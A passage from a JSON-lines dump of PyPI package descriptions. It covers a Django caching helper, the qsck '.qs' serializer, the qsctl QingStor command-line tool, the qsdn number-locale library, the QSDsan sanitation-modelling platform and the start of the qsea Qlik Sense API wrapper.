toNone.use_prefetch_related_for_list:Your list query can be heavy and you may not need toprefetch_relatedfor your list query but you need it for the detail of your objects. If it's True then we useprefetch_related_objectsfor our list query but if not we don't useprefetch_related_objectsfor our list even though it's set we only use it for getting an object not getting list of objects. Defaults toTrue.list_timeout:This is the timeout of your list cache key in seconds. Defaults to 86400 (1 day).detail_timeout:This is the timeout of your detail cache key in seconds. Defaults to 60 (1 minute).exception_class:This the exception that we raise when object is not found incache_manager.get()method. Defaults toHttp404. But if you are usingrest_frameworkyou may want to raiserest_framework.exceptions.NotFoundinstead ofHttp404.Here areBaseCacheManagerthat you may want to override.\nNow lets look at your modelcache_managermethods.all(suffix: Optional[str] = None, filter_kwargs: Optional[Dict[str, Any]] = None) -> QuerySet[ModelType]:This is the equivalent toModel.objects.all(). But we store it incache_keyand we fetch it from cache if queryset was in the cache otherwise sets queryset to the cache.suffix: Optional[str] = None: This suffix is added to the end ofcache_keyif provided. It's useful when you want to store a filtered queryset in cache and you also don't want to override yourcache_manager.all()queryset.filter_kwargs: Optional[Dict[str, Any]] = None: If you want to filter your queryset you can use it and pass your filter as a dict. For example{\"name__icontains\": \"mojix\", \"is_active\": True}same as Django API. but it's better to usesuffixandfilter_kwargsat the same time. Then you can cache your filters when you are using them so much. For example if you have a page that you show all of the active products and you want to cache your active products instead of all of the products. You can do thisproduct_cache_manager.all(suffix=\"active\", filter_kwargs={\"is_active\": True}).Notice:What if you wanted to filter your queryset without caching it? imagine if it was a simple search that you don't want to cache it. Remember thatcache_manager.all()returnsQueryset[ModelType]. So you can use everything on it that you do in Django and you can use it even as your model manager. look that this example below:cache_manager.all() # only hits db first time\ncache_manager.all(suffix=\"active\", filter_kwargs={\"is_active\": True}) # only hits db first time too\n\n# This not even cached you can use all the functionallity that you had in Django\n# It executes another query because you are filtering a Django queryset\n# You can use .filter(), .annotate(), etc\n# It's like Model.objects.all().filter(is_active=True)\n# So it's not stored in cache and feel free to use it\ncache_manager.all().filter(is_active=True)So far so good and easy.\nMore coming soon :)"} +{"package": "qscan", "pacakge-description": "A Quasar Spectra Scanning ToolDescriptionThis program allows you to scan in velocity any quasar spectrum and with any transitions. This is very similar to RDGEN but with a more stable display. One can also select the fitting regions and prepare a preliminaryfort.13in order to start fitting with VPFIT.Installation & DependenciesThe program can be installed very easily using thepip Python package manageras follows:sudopipinstallqscanThe program was built using thePython Standard Libraryas well as 4 external Python packages:NumPy,Matplotlib,AstropyandSciPy.UsageThe usage is pretty straightforward and corresponds to the following:qscan--optionLicense(The MIT License)Copyright (c) 2016-2020, Vincent Dumont. All rights reserved.Permission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE."} +{"package": "qsci", "pacakge-description": "Quantumscience is a tool designed to simplify the deployment of algorithms or applications onto quantum circuits. It builds upon the foundation of isqdeployer, which, in turn, utilizes isqc. As a result, qsci also possesses the potential to optimize circuit-level calculations.\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n \u2551 qsci \u2551 high level application \n \u255a\u2550\u2550\u2550\u2566\u2550\u2550\u2550\u2550\u255d\n \u2551 \n \u2554\u2550\u2550\u2550\u2550\u2550\u2569\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n \u2551 isqdeployer \u2551\n \u2551 \u2551\n \u2551 \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2557 \u2551 \u256d\u2500\u2500\u2500\u2500\u256e\n \u2551 \u2551pyisqc\u2560\u2550\u2550\u256c\u2550\u2550\u2550\u2561isqc\u2502 circuit optimization\n \u2551 \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d \u2551 \u2570\u2500\u2500\u2500\u2500\u256f \n \u255a\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u255d\n \u256d\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u256e \u2502 \u2502 \n \u2502 hardware\u2502 \u2502 \u2502 \n \u2570\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256f \u2502 \u2502\n \u256d\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u256e \u2502\n \u2502simulator\u2502 \u2502 \n \u2570\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256f \u2502\n \u256d\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256e\n \u2502user-defined\u2502 any prospective machine\n \u2502 backend \u2502\n \u2570\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256f"} +{"package": "qsck", "pacakge-description": "qsckPython library for serializing and deserializing a wonky format referred to\nas \".qs\" files. For full format specification, please read throughtests.test_serializeandtests.test_deserializetest suites and extrapolate.Quick StartUse Python \u2265 3.6 only.To install it, simply:pip3 install qsckSerializing DataVia Python:python3 -c \"import qsck; print(qsck.serialize('LOG', '1553302923', [\n ('first_key', 'some value'),\n ('2nd_key', [('attr1', 'foo'), ('attr2', 'bar')]),\n ('3rd_key', {'subKey1': '-3', 'subKey2': None}),\n ('4th_key', None)\n]))\"Out comes a \".qs\" record, like so:LOG,1553302923,first_key=some value,2nd_key={attr1=foo, attr2=bar},3rd_key={\"subKey1\":\"-3\",\"subKey2\":null},4th_key=(null)The library also supports serializing data by passing in a JSON file via\nthe command-line toolqs-format, one record per line:qs-format my-records.json > my-records.qsDeserializing DataVia Python:python3 -c \"import pprint, qsck; pprint.pprint(qsck.deserialize(\n 'LOG,1553302923,first_key=some value,2nd_key={attr1=foo, \\\n attr2=bar},3rd_key={\\\"subKey1\\\":\\\"-3\\\",\\\"subKey2\\\":null},4th_key=(null)'))\"Out comes a friendly Python collection:('LOG',\n '1553302923',\n [('first_key', 'some value'),\n ('2nd_key', [('attr1', 'foo'), ('attr2', 'bar')]),\n ('3rd_key', {'subKey1': '-3', 'subKey2': None}),\n ('4th_key', None)])The library-providedqs-parsecommand-line tool supports deserializing a whole\n\".qs\" log file, emitting one JSON record per input line to stdout:qs-parse my-records.qs > my-records.jsonContributingReally? Very welcome. Do the usual fork-and-submit-PR thingy.Running the tests:python setup.py testDistributing:pip3 install --upgrade twine wheel setuptools\npython setup.py sdist bdist_wheel\ntwine upload dist/*Changelog0.3- Better DeserializationAdds support for funky \"nested-nested lists\" in .qs recordsSquashing complex comma (,) values0.2\u2013 Deserialize AddedAdds support for de-serializing \".qs\" records.0.1\u2013 Initial ReleaseSupports serializing \".qs\" records."} +{"package": "qscollect", "pacakge-description": "SeeConfigurationwiki page for information on configuring QSCollect"} +{"package": "qscollect-withings", "pacakge-description": "UNKNOWN"} +{"package": "qs-cs-common-helpers", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qs-cs-config-parser", "pacakge-description": "No description available on PyPI."} +{"package": "qs-cs-sandbox-extractor", "pacakge-description": "No description available on PyPI."} +{"package": "qs-cs-script-foundry", "pacakge-description": "A cli way to update scripts and drivers to cloudshell.usage:\nUsage: csupload update [OPTIONS]Options:--nameTEXTcustom name for the script (optional)--typeTEXTscript or driver are supported--helpShow this message and exit.it uses credentials from shellfoundry , it can be viewed by typing \u201ccsupload config\u201d"} +{"package": "qsct", "pacakge-description": "QSCT - (Qodex Software Communication Tools) - \u044d\u0442\u043e \u043a\u043b\u0430\u0441\u0441, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u0439 \u0438\u0437 \u0441\u0435\u0431\u044f \u043d\u0430\u0431\u043e\u0440 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0434\u043b\u044f\n\u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f API \u0438 SDK. \u042f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0441\u0443\u043f\u0435\u0440-\u043a\u043b\u0430\u0441\u0441\u043e\u043c \u0434\u043b\u044f \u0441\u0443\u0431-\u043a\u043b\u0430\u0441\u0441\u043e\u0432:\n1) QPI (Qodex Programming Interface) - API \u0434\u043b\u044f \u041f\u041e \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0438 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Qodex,\n2) QDK (Qodex Development Kit) - SDK \u0434\u043b\u044f \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 API \u041f\u041e Qodex.\nQSCT \u043e\u043f\u0440\u0435\u0434\u043b\u0435\u044f\u0435\u0442 \u043c\u0435\u0442\u043e\u0434\u044b \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0438 \u0438 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u044b\u0445, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043f\u0440\u043e\u0447\u0435\u0433\u043e \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u043c\u0435\u0436\u0434\u0443 \u044d\u0442\u0438\u043c\u0438 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0438.v. 0.02\n\u0414\u043e\u0431\u0430\u0432\u043b\u0435\u043d \u043c\u0435\u0442\u043e\u0434 \u0434\u043b\u044f \u0445\u0435\u0448\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u0430\u0440\u043e\u043b\u044f \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0430\u043b\u043e\u0433\u0440\u0438\u0442\u043c\u0430 SHA-512"} +{"package": "qsct-hs", "pacakge-description": "QSCT - (Qodex Software Communication Tools) - \u044d\u0442\u043e \u043a\u043b\u0430\u0441\u0441, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u0439 \u0438\u0437 \u0441\u0435\u0431\u044f \u043d\u0430\u0431\u043e\u0440 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0434\u043b\u044f\n\u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f API \u0438 SDK. \u042f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0441\u0443\u043f\u0435\u0440-\u043a\u043b\u0430\u0441\u0441\u043e\u043c \u0434\u043b\u044f \u0441\u0443\u0431-\u043a\u043b\u0430\u0441\u0441\u043e\u0432:\n1) QPI (Qodex Programming Interface) - API \u0434\u043b\u044f \u041f\u041e \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0438 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Qodex,\n2) QDK (Qodex Development Kit) - SDK \u0434\u043b\u044f \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 API \u041f\u041e Qodex.\nQSCT \u043e\u043f\u0440\u0435\u0434\u043b\u0435\u044f\u0435\u0442 \u043c\u0435\u0442\u043e\u0434\u044b \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0438 \u0438 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u044b\u0445, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043f\u0440\u043e\u0447\u0435\u0433\u043e \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u043c\u0435\u0436\u0434\u0443 \u044d\u0442\u0438\u043c\u0438 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0438.v. 0.02\n\u0414\u043e\u0431\u0430\u0432\u043b\u0435\u043d \u043c\u0435\u0442\u043e\u0434 \u0434\u043b\u044f \u0445\u0435\u0448\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u0430\u0440\u043e\u043b\u044f \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0430\u043b\u043e\u0433\u0440\u0438\u0442\u043c\u0430 SHA-512"} +{"package": "qsctl", "pacakge-description": "qsctl is intended to be an advanced command line tool for QingStor, it provides\npowerful unix-like commands to let you manage QingStor resources just like files\non local machine. Unix-like commands contains: cp, ls, mb, mv, rm, rb, and sync.\nAll of them support batch processing.Installationvirtualenv:$ pip install qsctlSystem-Wide:$ sudo pip install qsctlOn Windows systems, run it in a command-prompt window with administrator\nprivileges, and leave out sudo.Getting StartedTo use qsctl, there must be a configuration file , for example:access_key_id: 'ACCESS_KEY_ID_EXAMPLE'\nsecret_access_key: 'SECRET_ACCESS_KEY_EXAMPLE'The configuration file is~/.qingstor/config.yamlby default, it also\ncan be specified by the option-c/path/to/config.You can also config other option likehost,portand so on, just\nadd lines below into configuration file, for example:host: 'qingstor.com'\nport: 443\nprotocol: 'https'\nconnection_retries: 3\n# Valid levels are 'debug', 'info', 'warn', 'error', and 'fatal'.\nlog_level: 'debug'Available CommandsCommands supported by qsctl are listed below:lsList QingStor keys under a prefix or all QingStor buckets.cpCopy local file(s) to QingStor or QingStor key(s) to local.mbCreate a QingStor bucket.rbDelete an empty QingStor bucket or forcibly delete nonempty QingStor bucket.mvMove local file(s) to QingStor or QingStor key(s) to local.rmDelete a QingStor key or keys under a prefix.syncSync between local directory and QingStor prefix.presignGenerate a pre-signed URL for an object.ExamplesList keys in bucket by running:$ qsctl ls qs://mybucket\nDirectory test/\n2016-04-03 11:16:04 4 Bytes test1.txt\n2016-04-03 11:16:04 4 Bytes test2.txtSync from QingStor prefix to local directory:$ qsctl sync qs://mybucket3/test/ test/\nFile 'test/README.md' written\nFile 'test/commands.py' writtenSee the detailed usage and more examples with \u2018qsctl help\u2019 or \u2018qsctl help\u2019."} +{"package": "qsd", "pacakge-description": "No description available on PyPI."} +{"package": "qsde", "pacakge-description": "No description available on PyPI."} +{"package": "qs-distributions", "pacakge-description": "No description available on PyPI."} +{"package": "q-sdk", "pacakge-description": "Reference implementation of the API of QQ"} +{"package": "qsdn", "pacakge-description": "Welcome to Standard Decimal Notation's documentation!*****************************************************Contents:... module:: qsdnplatform:Unix, Windowssynopsis:This module allows for parsing, validation and production ofnumeric literals, written with thousand separators through outthe number. Often underlying system libraries for working withlocales neglect to put thousand separators (commas) after thedecimal place or they sometimes use scientific notation. Theclasses inherit from the Qt classes for making things lesscomplex.Thousand separators in general will not always be commas butinstead will be different according to the locale settings. InWindows for example, the user can set his thousand separator to anycharacter. Support for converting strings directly to Decimals andfrom Decimals to strings is included.Also, numbers are always expressed in standard decimal notation.Care has been taken to overload all of the members in a way that isconsistent with the base class QLocale and QValidator.This module requires PyQt5. It is presently only tested withMicrosoft Windows. Users from other platforms are invited to joinmy team and submit pull-requests to ensure correct functioning. IfKDE and PyKDE are installed on your system, KDE's settings forthousands separator and decimal symbol will be used. Otherwise thesystem's locale settings will be used to determine these values.class qsdn.Locale(_name=None, p_mandatory_decimals=Decimal('0'), p_maximum_decimals=Decimal('Infinity'))For a Locale, locale:Main benefit is numbers converted to a string are alwaysconverted to standard decimal notation. And you control howfar numbers are written before they are truncated. Anotherbenefit is it works with decimal.Decimal numbers natively.So numbers get converted directly from String to Decimal andvice versa.To construct one, you can supply a name of a locale and specifythe mandatory and maximum digits after the decimal point.locale = Locale(\"en_US\", 2, 3) locale.toString(4) is '4.00'locale.toString(4.01) is '4.01' locale.toString(1/3) is '0.333'To specify the language and script, pass in a QLocale to theconstructor: like this: qlocale = QLocale('en_US',QLocale.Latin, QLocale.Spanish) sdnlocale = Locale(qlocale, 2,3)To get the Decimal of a string, s, use:(d, ok) = locale.toDecimal(s, 10)The value d is your decimal, and you should check ok beforeyou trust d.To get the string representation use:s = locale.toString(d)All to* routines take a string, and an optional base. If thebase is set to zero, it will look at the first digits of thenumber to determine base it should use. So, '013' will beinterpreted as 11 (as 0 indicates octal form) unless you set thebase to 10, in which as it will be interpreted as 13. You canuse '0x' to prefix hexadecimal numbers. Some developers don'twant to expose this programming concept to the users of thiersoftware. For those who don't specify the base explicitly as10. As of 1.0.0, the base defaults to 10, because the newbehavior as of PyQt5 in the QLocale class is to always have thebase fixed as 10.By default Locale will use the settings specified in yourdefault locale. This is guaranteed to be true for Mac OS,Windows and KDE-GUIs.static c()Returns the C locale. In the C locale, to* routines will notaccept group separtors and do not produce them.static setDefault(QLocale)static system()Returns the system default for Locale.toDecimal(s, *, base=10)This creates a decimal representation of s.It returns an ordered pair. The first of the pair is theDecimal number, the second of the pair indicates whetherthe string had a valid representation of that number. Youshould always check the second of the ordered pair beforeusing the decimal returned.It returns an ordered pair. The first of the pair is thenumber, the second of the pair indicates whether the stringhad a valid representation of that number. You should alwayscheck the second of the ordered pair before using the numberreturned.note:You may set another parameter, the base, so you caninterpret the string as 8 for octal, 16 for hex, 2 forbinary.If base is set to 0, numbers such as '0777' will beinterpreted as octal. The string '0x33' will be interpretedas hexadecimal and '777' will be interpreted as a decimal.Like the other to* functions of QLocale as well as this classLocale, interpret aa string and parse it and return a Decimal. The base valueis used to determine what base to use. It is done this way sothis works like toLong, toInt, toFloat, etc... Leading andtrailing whitespace is ignored.toDouble(s, *, base=10)Parses the string s and returns a floating point value whosestring is s.It returns an ordered pair. The first of the pair is thenumber, the second of the pair indicates whether the string hada valid representation of that number. You should always checkthe second of the ordered pair before using the number returned.note:You may set another parameter, the base, so you caninterpret the string as 8 for octal, 16 for hex, 2 forbinary.If base is set to 0, numbers such as '0777' will be interpretedas octal. The string '0x33' will be interpreted as hexadecimaland '777' will be interpreted as a decimal.It returns an ordered pair. The first of the pair is thenumber, the second of the pair indicates whether the stringhad a valid representation of that number. You should alwayscheck the second of the ordered pair before using the numberreturned.toFloat(s, *, base=10)Parses the string s and returns a floating point value whosestring is s.It returns an ordered pair. The first of the pair is thenumber, the second of the pair indicates whether the string hada valid representation of that number. You should always checkthe second of the ordered pair before using the number returned.note:You may set another parameter, the base, so you caninterpret the string as 8 for octal, 16 for hex, 2 forbinary.If base is set to 0, numbers such as '0777' will be interpretedas octal. The string '0x33' will be interpreted as hexadecimaland '777' will be interpreted as a decimal.toInt(s, *, base=10)Parses the string s and returns an integer value whose string iss.It returns an ordered pair. The first of the pair is thenumber, the second of the pair indicates whether the string hada valid representation of that number. You should always checkthe second of the ordered pair before using the number returned.note:You may set another parameter, the base, so you caninterpret the string as 8 for octal, 16 for hex, 2 forbinary.If base is set to 0, numbers such as '0777' will be interpretedas octal. The string '0x33' will be interpreted as hexadecimaland '777' will be interpreted as a decimal.toLongLong(s, *, base=10)Parses the string s and returns a floating point value whosestring is s.It returns an ordered pair. The first of the pair is thenumber, the second of the pair indicates whether the string hada valid representation of that number. You should always checkthe second of the ordered pair before using the number returned.note:You may set another parameter, the base, so you caninterpret the string as 8 for octal, 16 for hex, 2 forbinary.If base is set to 0, numbers such as '0777' will be interpretedas octal. The string '0x33' will be interpreted as hexadecimaland '777' will be interpreted as a decimal.Leading and trailing whitespace is ignored.toShort(s, *, base=10)Parses the string s and returns a short value whose string is s.It returns an ordered pair. The first of the pair is thenumber, the second of the pair indicates whether the string hada valid representation of that number. You should always checkthe second of the ordered pair before using the number returned.note:You may set another parameter, the base, so you caninterpret the string as 8 for octal, 16 for hex, 2 forbinary.If base is set to 0, numbers such as '0777' will be interpretedas octal. The string '0x33' will be interpreted as hexadecimaland '777' will be interpreted as a decimal.Leading and trailing whitespace is ignored.toString(x, arg2=None, arg3=None)Convert any given Decimal, double, Date, Time, int or long to astring.Numbers are always converted to Standard decimal notation. Thatis to say, numbers are never converted to scientifc notation.The way toString is controlled: If passing a decimal.Decimaltyped value, the precision is recorded in the number itself.So, D('4.00') will be expressed as '4.00' and not '4'. D('4')will be expressed as '4'.When a number passed is NOT a Decimal, numbers are created inthe following way: Two extra parameters, set during creation ofthe locale, determines how many digits will appear in theresult of toString(). For example, we have a number like 5.1 andmandatory decimals was set to 2, toString(5.1) should return'5.10'. A number like 6 would be '6.00'. A number like 5.104would depend on the maximum decimals setting, also set atconstruction of the locale: _maximum_decimals controls themaximum number of decimals after the decimal point So, if_maximum_decimals is 6 and _mandatory_decimals is 2 thentoString(3.1415929) is '3.141,592'. Notice the number istruncated and not rounded. Consider rounding a copy of thenumber before displaying.toUInt(s, *, base=10)Parses the string s and returns an unsigned integer value whosestring is s.It returns an ordered pair. The first of the pair is thenumber, the second of the pair indicates whether the string hada valid representation of that number. You should always checkthe second of the ordered pair before using the number returned.note:You may set another parameter, the base (which defaults to10), so you can interpret the string as 8 for octal, 16for hex, 2 for binary.If base is set to 0, numbers such as '0777' will be interpretedas octal. The string '0x33' will be interpreted as hexadecimaland '777' will be interpreted as a decimal.Leading and trailing whitespace is ignored.toULongLong(s, base=10)Parses the string s and returns an unsigned long long valuewhose string is s.It returns an ordered pair. The first of the pair is thenumber, the second of the pair indicates whether the string hada valid representation of that number. You should always checkthe second of the ordered pair before using the number returned.note:You may set another parameter, the base, so you caninterpret the string as 8 for octal, 16 for hex, 2 forbinary.If base is set to 0, numbers such as '0777' will be interpretedas octal. The string '0x33' will be interpreted as hexadecimaland '777' will be interpreted as a decimal.Leading and trailing whitespace is ignored.toUShort(s, base=10)Parses the string s and returns a unsigned long long value whosestring is s.It returns an ordered pair. The first of the pair is thenumber, the second of the pair indicates whether the string hada valid representation of that number. You should always checkthe second of the ordered pair before using the number returned.note:You may set another parameter, the base, so you caninterpret the string as 8 for octal, 16 for hex, 2 forbinary.If base is set to 0, numbers such as '0777' will be interpretedas octal. The string '0x33' will be interpreted as hexadecimaland '777' will be interpreted as a decimal.Leading and trailing whitespace is ignored.class qsdn.NumericValidator(parent=None)NumericValidator allows for numbers of any length butgroupSeparators are added or corrected when missing or out ofplace.U.S. dollar amounts;dollar = NumericValidator(6,2) s = '42.1'dollar.validate(s='42.1', 2) => s = '42.10' s='50000'dollar.toString(s) => s = ' 50,000.00'locale()get the locale used by this validatorsetLocale(plocale)Set the locale used by this Validator.validate(self, str, int) -> Tuple[QValidator.State, str, int]class qsdn.LimitingNumericValidator(maximum_decamals=1000, maximum_decimals=1000, use_space=False, parent=None)NumericValidator limits the number of digits after the decimalpoint and the number of digits before.bitcoin :NumericValidator(8, 8) US dollars less than $1,000,000 :NumericValidator(6, 2)If use space is true, spaces are added on the left such that thelocation of decimal point remains constant. Numbers like'10,000.004', '102.126' become aligned. Bitcoin amounts:' 0.004,3' ' 10.4' ' 320.0' '0.000,004'U.S. dollar amounts;dollar = NumericValidator(6,2) s = '42.1'dollar.validate(s='42.1', 2) => s = ' 42.10's='50000' dollar.toString(s) => s = '50,000.00'decamals()gets the number of decimal digits that are allowed **before**the decimal point (apart from spaces)decimals()gets the number of decimal digits that are allowed *after* thedecimal pointlocale()get the locale used by this validatorsetDecamals(i)sets the number of decimal digits that should be allowed**before** the decimal pointsetDecimals(i)sets the number of decimal digits that should be allowed**after** the decimal pointsetLocale(plocale)Set the locale used by this Validator.validate(s, pos)Validates s, by adjusting the position of the commas to be inthe correct places and adjusting pos accordingly as well asspace in order to keep decimal points aligned when varying sizednumbers are put one above the other.Indices and tables******************* Index* Module Index* Search Page"} +{"package": "qsdsan", "pacakge-description": "ContentsWhat isQSDsan?InstallationDocumentationAbout the AuthorsContributingStay ConnectedQSDsan EventsLicense InformationReferencesWhat isQSDsan?QSDsanis an open-source, community-led platform for the quantitative sustainable design (QSD) of sanitation and resource recovery systems[1]. It is one of a series of platforms that are being developed for the execution of QSD - a methodology for the research, design, and deployment of technologies and inform decision-making[2]. It leverages the structure and modules developed in theBioSTEAMplatform[3]with additional functions tailored to sanitation processes.As an open-source and impact-driven platform, QSDsan aims to identify configuration combinations, systematically probe interdependencies across technologies, and identify key sensitivities to contextual assumptions through the use of quantitative sustainable design methods (techno-economic analysis and life cycle assessment and under uncertainty).All systems developed withQSDsanare included in the packageEXPOsan- exposition of sanitation and resource recovery systems.Additionally, another package,DMsan(decision-making for sanitation and resource recovery systems), is being developed for decision-making among multiple dimensions of sustainability with consideration of location-specific contextual parameters.InstallationThe easiest way is throughpip, in command-line interface (e.g., Anaconda prompt, terminal):pip install qsdsanIf you need to upgrade:pip install -U qsdsanor for a specific version (replace X.X.X with the version number):pip install qsdsan==X.X.XIf you want to install the latest GitHub version at themain branch(note that you can still use the-Uflag for upgrading):pip install git+https://github.com/QSD-Group/QSDsan.gitNoteIf this doesn\u2019t give you the newestqsdsan, trypip uninstall qsdsanfirst.Also, you may need to update someqsdsan\u2019s dependency package (e.g., \u2018biosteamandthermosteam) versions in order for the newqsdsanto run.or other fork and/or branch (replaceandwith the desired fork and branch names)pip install git+https://github.com//QSDsan.git@You can also download the package fromPyPI.Note that development of this package is currently under initial stage with limited backward compatibility, please feel free tosubmit an issuefor any questions regarding package upgrading.If you want to contribute toQSDsan, please follow the steps in theContributing Guidelinessection of the documentation to clone the repository. If you find yourself struggle with the installation of QSDsan/setting up the environment, this extended version ofinstallation instructionsmight be helpful to you.DocumentationYou can find tutorials and documents at:https://qsdsan.readthedocs.ioAll tutorials are written using Jupyter Notebook, you can run your own Jupyter environment, or you can click thelaunch binderbadge on the top to launch the environment in your browser.For each of these tutorials, we are also recording videos where one of the QSD group members will go through the tutorial step-by-step. We are gradually releasing these videos on ourYouTube channelso subscribe to receive updates!About the AuthorsPlease refer toContributorssection for a list of contributors.ContributingPlease refer to theContributing Guidelinessection of the documentation for instructions and guidelines.Stay ConnectedIf you would like to receive news related to the QSDsan platform, you can subscribe to email updates usingthis form(don\u2019t worry, you will be able to unsubscribe :)). Thank you in advance for your interest!QSDsan EventsWe will keep thiscalendarup-to-date as we organize more events (office hours, workshops, etc.), click on the events in the calendar to see the details (including meeting links).License InformationPlease refer to theLICENSE.txtfor information on the terms & conditions for usage of this software, and a DISCLAIMER OF ALL WARRANTIES.References[1]Li, Y.; Zhang, X.; Morgan, V.L.; Lohman, H.A.C.; Rowles, L.S.; Mittal, S.; Kogler, A.; Cusick, R.D.; Tarpeh, W.A.; Guest, J.S. QSDsan: An integrated platform for quantitative sustainable design of sanitation and resource recovery systems. Environ. Sci.: Water Res. Technol. 2022, 8 (10), 2289-2303.https://doi.org/10.1039/d2ew00455k.[2]Li, Y.; Trimmer, J.T.; Hand, S.; Zhang, X.; Chambers, K.G.; Lohman, H.A.C.; Shi, R.; Byrne, D.M.; Cook, S.M.; Guest, J.S. Quantitative Sustainable Design (QSD): A Methodology for the Prioritization of Research, Development, and Deployment of Technologies. (Tutorial Review) Environ. Sci.: Water Res. Technol. 2022, 8 (11), 2439\u20132465.https://doi.org/10.1039/D2EW00431C.[3]Cort\u00e9s-Pe\u00f1a, Y.; Kumar, D.; Singh, V.; Guest, J.S. BioSTEAM: A Fast and Flexible Platform for the Design, Simulation, and Techno-Economic Analysis of Biorefineries under Uncertainty. ACS Sustainable Chem. Eng. 2020, 8 (8), 3302\u20133310.https://doi.org/10.1021/acssuschemeng.9b07040."} +{"package": "qsea", "pacakge-description": "TitleQSEA refers to the Qlik Sense Engine API.DescriptionQSEA is designed to automate basic operations with Qlik Sense Enterprise apps in a Pythonic way. With QSEA, you can quickly view and edit variables, master measures, and dimensions, as well as main sheet objects. For example, you can replace variables in all master measures of your app with just one line of code.formsinApp.measures:ms.update(definition=replace(ms.definition,'$(var1)','$(var2)'))or quickly move all measures from one app to another:formsinApp1.measures:App2.measures.add(name=ms.name,definition=ms.definition)InstallationpipinstallqseaTable of ContentsGetting startedFull GuideApp classApp.load()App.save()App.reload_data()App.childrenAppChildren classAppChildren addVariable classVariable propertiesVariable.update()Variable.delete()Variable.rename()Variable.get_layout()Measure classMeasure propertiesMeasure.update()Measure.delete()Measure.rename()Measure.get_layout()Dimension classDimension propertiesDimension.update()Dimension.delete()Dimension.rename()Dimension.get_layout()Sheet classSheet propertiesSheet.load()Sheet.get_layout()Field classField propertiesObject classObject propertiesObject.export_data()Object.load()Object.get_layout()ObjectChildren classObjectMeasure classObjectMeasure propertiesObjectMeasure.update()ObjectMeasure.delete()ObjectDImension classObjectDimension propertiesObjectDimension.update()ObjectDimension.delete()LicenseGetting startedQSEA uses the Qlik Sense Engine API via the Qlik Sense Proxy Service as its main tool, so you'll need the correct API credentials to start working with QSEA. Please refer to the following links for help.https://help.qlik.com/en-US/sense-developer/May2023/Subsystems/EngineAPI/Content/Sense_EngineAPI/GettingStarted/connecting-to-engine-api.htmhttps://help.qlik.com/en-US/cloud-services/Subsystems/Hub/Content/Sense_Hub/Admin/mc-generate-api-keys.htmYour credentials should look something like thisheader_user={'Authorization':'Bearer '}qlik_url=\"wss://server.domain.com[/virtual proxy]/app/\"Now we can connect to the Qlik Server:conn=qsea.Connection(header_user,qlik_url)Let's create an App object, which represents the application in Qlik 